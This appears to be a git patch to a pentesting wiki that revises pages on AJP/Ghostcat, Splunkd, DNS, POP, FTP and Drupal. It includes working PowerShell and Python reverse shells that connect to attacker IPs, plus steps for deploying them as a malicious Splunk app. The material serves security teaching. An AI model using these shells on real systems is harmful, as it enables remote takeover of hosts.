From ae33d7c8c60b7453dadbcdf8ddcf0def4c2d33b0 Mon Sep 17 00:00:00 2001 From: CPol Date: Thu, 12 Dec 2024 01:48:01 +0000 Subject: [PATCH] GITBOOK-4444: No subject --- SUMMARY.md | 2 +- ...09-pentesting-apache-jserv-protocol-ajp.md | 94 ++--------- network-services-pentesting/8089-splunkd.md | 150 +++++++++--------- network-services-pentesting/pentesting-dns.md | 66 ++------ .../pentesting-ftp/README.md | 4 +- network-services-pentesting/pentesting-pop.md | 26 +-- .../pentesting-web/README.md | 4 +- .../pentesting-web/drupal/README.md | 57 +++---- .../pentesting-web/drupal/drupal-rce.md | 33 +--- .../{tomcat.md => tomcat/README.md} | 12 +- .../pentesting-web/wordpress.md | 59 +++---- ...inclusion-edge-side-inclusion-injection.md | 26 +-- 12 files changed, 183 insertions(+), 350 deletions(-) rename network-services-pentesting/pentesting-web/{tomcat.md => tomcat/README.md} (89%) diff --git a/SUMMARY.md b/SUMMARY.md index c418f53a1c8..25179eb4327 100644 --- a/SUMMARY.md +++ b/SUMMARY.md @@ -430,7 +430,7 @@ * [Source code Review / SAST Tools](network-services-pentesting/pentesting-web/code-review-tools.md) * [Spring Actuators](network-services-pentesting/pentesting-web/spring-actuators.md) * [Symfony](network-services-pentesting/pentesting-web/symphony.md) - * [Tomcat](network-services-pentesting/pentesting-web/tomcat.md) + * [Tomcat](network-services-pentesting/pentesting-web/tomcat/README.md) * [Uncovering CloudFlare](network-services-pentesting/pentesting-web/uncovering-cloudflare.md) * [VMWare (ESX, VCenter...)](network-services-pentesting/pentesting-web/vmware-esx-vcenter....md) * [Web API Pentesting](network-services-pentesting/pentesting-web/web-api-pentesting.md) diff --git a/network-services-pentesting/8009-pentesting-apache-jserv-protocol-ajp.md b/network-services-pentesting/8009-pentesting-apache-jserv-protocol-ajp.md index 92cc3dbba7d..d9c79c2b2e6 100644 --- a/network-services-pentesting/8009-pentesting-apache-jserv-protocol-ajp.md +++ b/network-services-pentesting/8009-pentesting-apache-jserv-protocol-ajp.md @@ -32,7 +32,7 @@ Stay informed with the newest bug bounties launching and crucial platform update ## Basic Information -From: [https://diablohorn.com/2011/10/19/8009-the-forgotten-tomcat-port/](https://diablohorn.com/2011/10/19/8009-the-forgotten-tomcat-port/) +From [https://diablohorn.com/2011/10/19/8009-the-forgotten-tomcat-port/](https://diablohorn.com/2011/10/19/8009-the-forgotten-tomcat-port/) > AJP is a wire protocol. It an optimized version of the HTTP protocol to allow a standalone web server such as [Apache](http://httpd.apache.org/) to talk to Tomcat. Historically, Apache has been much faster than Tomcat at serving static content. The idea is to let Apache serve the static content when possible, but proxy the request to Tomcat for Tomcat related content. @@ -49,11 +49,9 @@ PORT STATE SERVICE ## CVE-2020-1938 ['Ghostcat'](https://www.chaitin.cn/en/ghostcat) -If the AJP port is exposed, Tomcat might be susceptible to the Ghostcat vulnerability. Here is an [exploit](https://www.exploit-db.com/exploits/48143) that works with this issue. +This is an LFI vuln which allows to get some files like `WEB-INF/web.xml` which contains credentials. This is an [exploit](https://www.exploit-db.com/exploits/48143) to abuse the vulnerability and AJP exposed ports might be vulnerable to it. -Ghostcat is a LFI vulnerability, but somewhat restricted: only files from a certain path can be pulled. Still, this can include files like `WEB-INF/web.xml` which can leak important information like credentials for the Tomcat interface, depending on the server setup. - -Patched versions at or above 9.0.31, 8.5.51, and 7.0.100 have fixed this issue. +The patched versions are at or above 9.0.31, 8.5.51, and 7.0.100. ## Enumeration @@ -67,25 +65,18 @@ nmap -sV --script ajp-auth,ajp-headers,ajp-methods,ajp-request -n -p 8009 ## AJP Proxy -### Nginx Reverse Proxy & AJP +### Nginx Reverse Proxy + AJP -[Checkout the Dockerized version](8009-pentesting-apache-jserv-protocol-ajp.md#Dockerized-version) +([Checkout the Dockerized version](8009-pentesting-apache-jserv-protocol-ajp.md#Dockerized-version)) -When we come across an open AJP proxy port (8009 TCP), we can use Nginx with the `ajp_module` to access the "hidden" Tomcat Manager. This can be done by compiling the Nginx source code and adding the required module, as follows: +It's possible to communicate with an open AJP proxy port (8009 TCP) by using the Nginx `ajp_module` apache module and access the Tomat Manager from this port which could ultimately lead to RCE in the vulnerable server. -* Download the Nginx source code -* Download the required module -* Compile Nginx source code with the `ajp_module`. -* Create a configuration file pointing to the AJP Port +* Start downloading Nginx from [https://nginx.org/en/download.html](https://nginx.org/en/download.html) and then compile it with the ajp module: ```bash -# Download Nginx code -wget https://nginx.org/download/nginx-1.21.3.tar.gz -tar -xzvf nginx-1.21.3.tar.gz - -# Compile Nginx source code with the ajp module +# Compile Nginx with the ajp module git clone https://github.com/dvershinin/nginx_ajp_module.git -cd nginx-1.21.3 +cd nginx-version sudo apt install libpcre3-dev ./configure --add-module=`pwd`/../nginx_ajp_module --prefix=/etc/nginx --sbin-path=/usr/sbin/nginx --modules-path=/usr/lib/nginx/modules make @@ -93,9 +84,9 @@ sudo make install nginx -V ``` -Comment out the entire `server` block and append the following lines inside the `http` block in `/etc/nginx/conf/nginx.conf`. +* Then, comment the `server` block and add the following in the `http` block in `/etc/nginx/conf/nginx.conf`. -```shell-session +```json upstream tomcats { server :8009; keepalive 10; @@ -109,41 +100,7 @@ server { } ``` -Start Nginx and check if everything is working correctly by issuing a cURL request to your local host. - -```html -sudo nginx -curl http://127.0.0.1:80 - - - - - - Apache Tomcat/X.X.XX - - - - -
- -
-

Apache Tomcat/X.X.XX

-
-
-
-

If you're seeing this, you've successfully installed Tomcat. Congratulations!

- -``` +* Finally, start nginx (`sudo nginx`) and check it works by accessing `http://127.0.0.1` ### Nginx Dockerized-version @@ -161,36 +118,11 @@ docker run -it --rm -p 80:80 nginx-ajp-proxy ### Apache AJP Proxy -Encountering an open port 8009 without any other accessible web ports is rare. However, it is still possible to exploit it using **Metasploit**. By leveraging **Apache** as a proxy, requests can be redirected to **Tomcat** on port 8009. - -```bash -sudo apt-get install libapache2-mod-jk -sudo vim /etc/apache2/apache2.conf # append the following line to the config - Include ajp.conf -sudo vim /etc/apache2/ajp.conf # create the following file, change HOST to the target address - ProxyRequests Off - - Order deny,allow - Deny from all - Allow from localhost - - ProxyPass / ajp://HOST:8009/ - ProxyPassReverse / ajp://HOST:8009/ -sudo a2enmod proxy_http -sudo a2enmod proxy_ajp -sudo systemctl restart apache2 -``` - -This setup offers the potential to bypass intrusion detection and prevention systems (IDS/IPS) due to the **AJP protocol's binary nature**, although this capability has not been verified. By directing a regular Metasploit Tomcat exploit to `127.0.0.1:80`, you can effectively seize control of the targeted system. - -```bash -msf exploit(tomcat_mgr_deploy) > show options -``` +It's also possible to use an **Apache AJP proxy** to access that port instead of **Nginx**. ## References * [https://github.com/yaoweibin/nginx\_ajp\_module](https://github.com/yaoweibin/nginx_ajp_module) -* [https://academy.hackthebox.com/module/145/section/1295](https://academy.hackthebox.com/module/145/section/1295)
diff --git a/network-services-pentesting/8089-splunkd.md b/network-services-pentesting/8089-splunkd.md index e7808b154cd..9b7dc97b075 100644 --- a/network-services-pentesting/8089-splunkd.md +++ b/network-services-pentesting/8089-splunkd.md @@ -1,15 +1,15 @@ # 8089 - Pentesting Splunkd {% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
Support HackTricks * Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** πŸ’¬ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Join the** πŸ’¬ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** * **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
@@ -17,36 +17,46 @@ Learn & practice GCP Hacking: &1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close( ``` - -The [inputs.conf](https://docs.splunk.com/Documentation/Splunk/latest/Admin/Inputsconf) file tells Splunk **which script to run** and any other conditions. Here we set the app as enabled and tell Splunk to run the script every 10 seconds. The interval is always in seconds, and the input (script) will only run if this setting is present. - -```shell-session -cat inputs.conf - -[script://./bin/rev.py] -disabled = 0 -interval = 10 -sourcetype = shell - -[script://.\bin\run.bat] -disabled = 0 -sourcetype = shell -interval = 10 +splunk_shell/ +β”œβ”€β”€ bin (reverse shell scripts) +└── default (inputs.conf configuration) ``` -We need the `.bat` file, which will run when the application is deployed and execute the PowerShell one-liner. +The critical configuration file `inputs.conf` enables the script by: -The next step is to choose `Install app from file` and upload the application. +* Setting `disabled = 0` +* Configuring a 10-second execution interval +* Defining the script's source type -
+Deployment is straightforward: -Before uploading the malicious custom app, let's start a listener using Netcat or [socat](https://linux.die.net/man/1/socat). +1. Create the malicious application package +2. Set up a listener (Netcat/socat) on the attacking machine +3. Upload the application through Splunk's interface +4. Trigger automatic script execution upon upload -```shell-session -sudo nc -lnvp 443 +Sample Windows PowerShell reverse shell: -listening on [any] 443 ... +```powershell +$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',443); +$stream = $client.GetStream(); +[byte[]]$bytes = 0..65535|%{0}; +while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){ + $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i); + $sendback = (iex $data 2>&1 | Out-String ); + $sendback2 = $sendback + 'PS ' + (pwd).Path + '> '; + $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); + $stream.Write($sendbyte,0,$sendbyte.Length); + $stream.Flush() +}; +$client.Close() ``` -On the `Upload app` page, click on browse, choose the tarball we created earlier and click `Upload`. As **soon as we upload the application**, a **reverse shell is received** as the status of the application will automatically be switched to `Enabled`. - -#### Linux - -If we were dealing with a **Linux host**, we would need to **edit the `rev.py` Python script** before creating the tarball and uploading the custom malicious app. The rest of the process would be the same, and we would get a reverse shell connection on our Netcat listener and be off to the races. +Sample Linux Python reverse shell: ```python -import sys,socket,os,pty - -ip="10.10.14.15" -port="443" -s=socket.socket() -s.connect((ip,int(port))) -[os.dup2(s.fileno(),fd) for fd in (0,1,2)] +import sys, socket, os, pty +ip = "10.10.14.15" +port = "443" +s = socket.socket() +s.connect((ip, int(port))) +[os.dup2(s.fileno(), fd) for fd in (0, 1, 2)] pty.spawn('/bin/bash') ``` @@ -137,15 +135,15 @@ In the following page you can find an explanation how this service can be abused * [https://academy.hackthebox.com/module/113/section/1213](https://academy.hackthebox.com/module/113/section/1213) {% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
Support HackTricks * Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** πŸ’¬ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Join the** πŸ’¬ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** * **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
diff --git a/network-services-pentesting/pentesting-dns.md b/network-services-pentesting/pentesting-dns.md index 64fd0c7e081..8c670ae72db 100644 --- a/network-services-pentesting/pentesting-dns.md +++ b/network-services-pentesting/pentesting-dns.md @@ -1,21 +1,21 @@ # 53 - Pentesting DNS {% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
Support HackTricks * Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** πŸ’¬ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Join the** πŸ’¬ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** * **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
{% endhint %} -
+
**Get a hacker's perspective on your web apps, network, and cloud** @@ -49,7 +49,7 @@ PORT STATE SERVICE REASON ### **Banner Grabbing** -There aren't banners in DNS but you can gran the macgic query for `version.bind. CHAOS TXT` which will work on most BIND nameservers.\ +There aren't banners in DNS but you can gran the magic query for `version.bind. CHAOS TXT` which will work on most BIND nameservers.\ You can perform this query using `dig`: ```bash @@ -142,7 +142,7 @@ If you are able to find subdomains resolving to internal IP-addresses, you shoul Another tool to do so: [https://github.com/amine7536/reverse-scan](https://github.com/amine7536/reverse-scan) -You can query reverse IP ranges to [https://bgp.he.net/net/205.166.76.0/24#\_dns](https://bgp.he.net/net/205.166.76.0/24#\_dns) (this tool is also helpful with BGP). +You can query reverse IP ranges to [https://bgp.he.net/net/205.166.76.0/24#\_dns](https://bgp.he.net/net/205.166.76.0/24#_dns) (this tool is also helpful with BGP). ### DNS - Subdomains BF @@ -204,7 +204,7 @@ dig google.com A @ ![](<../.gitbook/assets/image (146).png>) -
+
**Get a hacker's perspective on your web apps, network, and cloud** @@ -214,39 +214,12 @@ dig google.com A @ ### Mail to nonexistent account -Through the examination of a nondelivery notification (NDN) triggered by an email sent to an invalid address within a target domain, valuable internal network details are often disclosed. +**Sending an email to a non-existaent address** using the victims domain could trigger the victim to send a nondelivery notification (NDN) message whose **headers** could contain interesting information such as the **name of internal servers and IP addresses**. -The provided nondelivery report includes information such as: +## Post-Exploitation -* The generating server was identified as `server.example.com`. -* A failure notice for `user@example.com` with the error code `#550 5.1.1 RESOLVER.ADR.RecipNotFound; not found` was returned. -* Internal IP addresses and hostnames were disclosed in the original message headers. - -```markdown -The original message headers were modified for anonymity and now present randomized data: - -Generating server: server.example.com - -user@example.com -#550 5.1.1 RESOLVER.ADR.RecipNotFound; not found ## - -Original message headers: - -Received: from MAILSERVER01.domain.example.com (192.168.1.1) by -mailserver02.domain.example.com (192.168.2.2) with Microsoft SMTP Server (TLS) -id 14.3.174.1; Mon, 25 May 2015 14:52:22 -0700 -Received: from filter.example.com (203.0.113.1) by -MAILSERVER01.domain.example.com (192.168.1.1) with Microsoft SMTP Server (TLS) -id 14.3.174.1; Mon, 25 May 2015 14:51:22 -0700 -X-ASG-Debug-ID: 1432576343-0614671716190e0d0001-zOQ9WJ -Received: from gateway.domainhost.com (gateway.domainhost.com [198.51.100.37]) by -filter.example.com with ESMTP id xVNPkwaqGgdyH5Ag for user@example.com; Mon, -25 May 2015 14:52:13 -0700 (PDT) -X-Envelope-From: sender@anotherdomain.org -X-Apparent-Source-IP: 198.51.100.37 -``` - -## Config files +* When checking the configuration of a Bind server check the configuration of the param **`allow-transfer`** as it indicates who can perform zone transfers and **`allow-recursion`** and **`allow-query`** as the indicate who can send recursive requests and requests to it. +* The following are the names of DNS related files that could be interesting to search inside machines: ``` host.conf @@ -258,15 +231,6 @@ host.conf /etc/bind/* ``` -Dangerous settings when configuring a Bind server: - -| **Option** | **Description** | -| ----------------- | ------------------------------------------------------------------------------ | -| `allow-query` | Defines which hosts are allowed to send requests to the DNS server. | -| `allow-recursion` | Defines which hosts are allowed to send recursive requests to the DNS server. | -| `allow-transfer` | Defines which hosts are allowed to receive zone transfers from the DNS server. | -| `zone-statistics` | Collects statistical data of zones. | - ## References * [https://www.myrasecurity.com/en/knowledge-hub/dns/](https://www.myrasecurity.com/en/knowledge-hub/dns/) @@ -327,7 +291,7 @@ Entry_6: Command: msfconsole -q -x 'use auxiliary/scanner/dns/dns_amp; set RHOSTS {IP}; set RPORT 53; run; exit' && msfconsole -q -x 'use auxiliary/gather/enum_dns; set RHOSTS {IP}; set RPORT 53; run; exit' ``` -
+
**Get a hacker's perspective on your web apps, network, and cloud** @@ -336,15 +300,15 @@ Entry_6: {% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %} {% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
Support HackTricks * Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** πŸ’¬ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Join the** πŸ’¬ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** * **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
diff --git a/network-services-pentesting/pentesting-ftp/README.md b/network-services-pentesting/pentesting-ftp/README.md index 5ab8d70b150..374d5e91d02 100644 --- a/network-services-pentesting/pentesting-ftp/README.md +++ b/network-services-pentesting/pentesting-ftp/README.md @@ -164,8 +164,8 @@ wget -r --user="USERNAME" --password="PASSWORD" ftp://server.com/ * **`USER username`** * **`PASS password`** * **`HELP`** The server indicates which commands are supported -* \*\*`PORT 127,0,0,1,0,80`\*\*This will indicate the FTP server to establish a connection with the IP 127.0.0.1 in port 80 (_you need to put the 5th char as "0" and the 6th as the port in decimal or use the 5th and 6th to express the port in hex_). -* \*\*`EPRT |2|127.0.0.1|80|`\*\*This will indicate the FTP server to establish a TCP connection (_indicated by "2"_) with the IP 127.0.0.1 in port 80. This command **supports IPv6**. +* **`PORT 127,0,0,1,0,80`** This will indicate the FTP server to establish a connection with the IP 127.0.0.1 in port 80 (_you need to put the 5th char as "0" and the 6th as the port in decimal or use the 5th and 6th to express the port in hex_). +* **`EPRT |2|127.0.0.1|80|`** This will indicate the FTP server to establish a TCP connection (_indicated by "2"_) with the IP 127.0.0.1 in port 80. This command **supports IPv6**. * **`LIST`** This will send the list of files in current folder * **`LIST -R`** List recursively (if allowed by the server) * **`APPE /path/something.txt`** This will indicate the FTP to store the data received from a **passive** connection or from a **PORT/EPRT** connection to a file. If the filename exists, it will append the data. diff --git a/network-services-pentesting/pentesting-pop.md b/network-services-pentesting/pentesting-pop.md index 9ea68dff517..dc3e3596cbf 100644 --- a/network-services-pentesting/pentesting-pop.md +++ b/network-services-pentesting/pentesting-pop.md @@ -1,21 +1,20 @@ # 110,995 - Pentesting POP {% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
Support HackTricks * Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** πŸ’¬ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Join the** πŸ’¬ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** * **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
{% endhint %} - ## Basic Information **Post Office Protocol (POP)** is described as a protocol within the realm of computer networking and the Internet, which is utilized for the extraction and **retrieval of email from a remote mail server**, making it accessible on the local device. Positioned within the application layer of the OSI model, this protocol enables users to fetch and receive email. The operation of **POP clients** typically involves establishing a connection to the mail server, downloading all messages, storing these messages locally on the client system, and subsequently removing them from the server. Although there are three iterations of this protocol, **POP3** stands out as the most prevalently employed version. @@ -95,18 +94,9 @@ root@kali:~# telnet $ip 110 password: PA$$W0RD!Z ``` -## Dangerous Settings - -From [https://academy.hackthebox.com/module/112/section/1073](https://academy.hackthebox.com/module/112/section/1073) - -| **Setting** | **Description** | -| ------------------------- | ----------------------------------------------------------------------------------------- | -| `auth_debug` | Enables all authentication debug logging. | -| `auth_debug_passwords` | This setting adjusts log verbosity, the submitted passwords, and the scheme gets logged. | -| `auth_verbose` | Logs unsuccessful authentication attempts and their reasons. | -| `auth_verbose_passwords` | Passwords used for authentication are logged and can also be truncated. | -| `auth_anonymous_username` | This specifies the username to be used when logging in with the ANONYMOUS SASL mechanism. | +## Logging Passwords +POP servers with the setting **`auth_debug`** enabled will be increasing the logs generated. However, if **`auth_debug_passwords`** or **`auth_verbose_passwords`** are set as **`true`**, password could be also logged in clear text in those logs. ## HackTricks Automatic Commands @@ -152,15 +142,15 @@ Entry_6: ``` {% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
Support HackTricks * Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** πŸ’¬ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Join the** πŸ’¬ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** * **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
diff --git a/network-services-pentesting/pentesting-web/README.md b/network-services-pentesting/pentesting-web/README.md index f8ab8910f6a..4ed3520ebc0 100644 --- a/network-services-pentesting/pentesting-web/README.md +++ b/network-services-pentesting/pentesting-web/README.md @@ -115,7 +115,7 @@ Some **tricks** for **finding vulnerabilities** in different well known **techno * [**Python**](python.md) * [**Spring Actuators**](spring-actuators.md) * [**Symphony**](symphony.md) -* [**Tomcat**](tomcat.md) +* [**Tomcat**](tomcat/) * [**VMWare**](vmware-esx-vcenter....md) * [**Web API Pentesting**](web-api-pentesting.md) * [**WebDav**](put-method-webdav.md) @@ -161,7 +161,7 @@ node puff.js -w ./wordlist-examples/xss.txt -u "http://www.xssgame.com/f/m4KKGHi If a CMS is used don't forget to **run a scanner**, maybe something juicy is found: -[**Clusterd**](https://github.com/hatRiot/clusterd)**:** [**JBoss**](jboss.md)**, ColdFusion, WebLogic,** [**Tomcat**](tomcat.md)**, Railo, Axis2, Glassfish**\ +[**Clusterd**](https://github.com/hatRiot/clusterd)**:** [**JBoss**](jboss.md)**, ColdFusion, WebLogic,** [**Tomcat**](tomcat/)**, Railo, Axis2, Glassfish**\ [**CMSScan**](https://github.com/ajinabraham/CMSScan): [**WordPress**](wordpress.md), [**Drupal**](drupal/), **Joomla**, **vBulletin** websites for Security issues. (GUI)\ [**VulnX**](https://github.com/anouarbensaad/vulnx)**:** [**Joomla**](joomla.md)**,** [**Wordpress**](wordpress.md)**,** [**Drupal**](drupal/)**, PrestaShop, Opencart**\ **CMSMap**: [**(W)ordpress**](wordpress.md)**,** [**(J)oomla**](joomla.md)**,** [**(D)rupal**](drupal/) **or** [**(M)oodle**](moodle.md)\ diff --git a/network-services-pentesting/pentesting-web/drupal/README.md b/network-services-pentesting/pentesting-web/drupal/README.md index a36a0b85c47..a78ec7b3b4c 100644 --- a/network-services-pentesting/pentesting-web/drupal/README.md +++ b/network-services-pentesting/pentesting-web/drupal/README.md @@ -9,7 +9,7 @@ Learn & practice GCP Hacking: 
 <summary>Support HackTricks</summary>
 
 * Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** πŸ’¬ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
+* **Join the** πŸ’¬ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
 * **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>
@@ -35,12 +35,6 @@ curl drupal-site.com/node/1
 
 ## Enumeration
 
-Drupal supports **three types of users** by default:
-
-1. **`Administrator`**: This user has complete control over the Drupal website.
-2. **`Authenticated User`**: These users can log in to the website and perform operations such as adding and editing articles based on their permissions.
-3. **`Anonymous`**: All website visitors are designated as anonymous. By default, these users are only allowed to read posts.
-
 ### Version
 
 * Check `/CHANGELOG.txt`
@@ -57,36 +51,23 @@ Newer installs of Drupal by default block access to the `CHANGELOG.txt` and `REA
 
 ### Username enumeration
 
-#### Register
-
-In _/user/register_ just try to create a username and if the name is already taken it will be notified:
-
-![](<../../../.gitbook/assets/image (328).png>)
-
-#### Request new password
-
-If you request a new password for an existing username:
-
-![](<../../../.gitbook/assets/image (903).png>)
-
-If you request a new password for a non-existent username:
-
-![](<../../../.gitbook/assets/image (307).png>)
-
-### Get number of users
+Drupal supports **three types of users** by default:
 
-Accessing _/user/\<number>_ you can see the number of existing users, in this case is 2 as _/users/3_ returns a not found error:
+1. **`Administrator`**: This user has complete control over the Drupal website.
+2. **`Authenticated User`**: These users can log in to the website and perform operations such as adding and editing articles based on their permissions.
+3. **`Anonymous`**: All website visitors are designated as anonymous. By default, these users are only allowed to read posts.
 
-![](<../../../.gitbook/assets/image (333).png>)
+**To enumerate users you can:**
 
-![](<../../../.gitbook/assets/image (227) (1) (1) (1).png>)
+* **Get number of users:** Just access `/user/1`, `/user/2`, `/user/3`... until it returns an error indicating that the suer doesn't exist.
+* **Registry**: Access`/user/register` and try to create a username and if the name is already taken it will be indicated in an error from the server.
+* **Reset password**: Try to reset the password of a user and if the user doesn't exist it will be indicated clearly in an error message.
 
 ### Hidden pages
 
-**Fuzz `/node/$` where `$` is a number** (from 1 to 500 for example).\
-You could find **hidden pages** (test, dev) which are not referenced by the search engines.
+Just find new pages by looking into **`/node/FUZZ`** where **`FUZZ`** is a number (from 1 to 1000 for example).
 
-#### Installed modules info
+### Installed modules info
 
 ```bash
 #From https://twitter.com/intigriti/status/1439192489093644292/photo/1
@@ -98,7 +79,7 @@ curl https://example.com/core/core.services.yml
 curl https://example.com/config/sync/swiftmailer.transport.yml
 ```
 
-### Automatic
+## Automatic Tools
 
 ```bash
 droopescan scan drupal -u http://drupal-site.local
@@ -122,19 +103,19 @@ If you have access to the Drupal web console check these options to get RCE:
 
 ### Read settings.php
 
-```
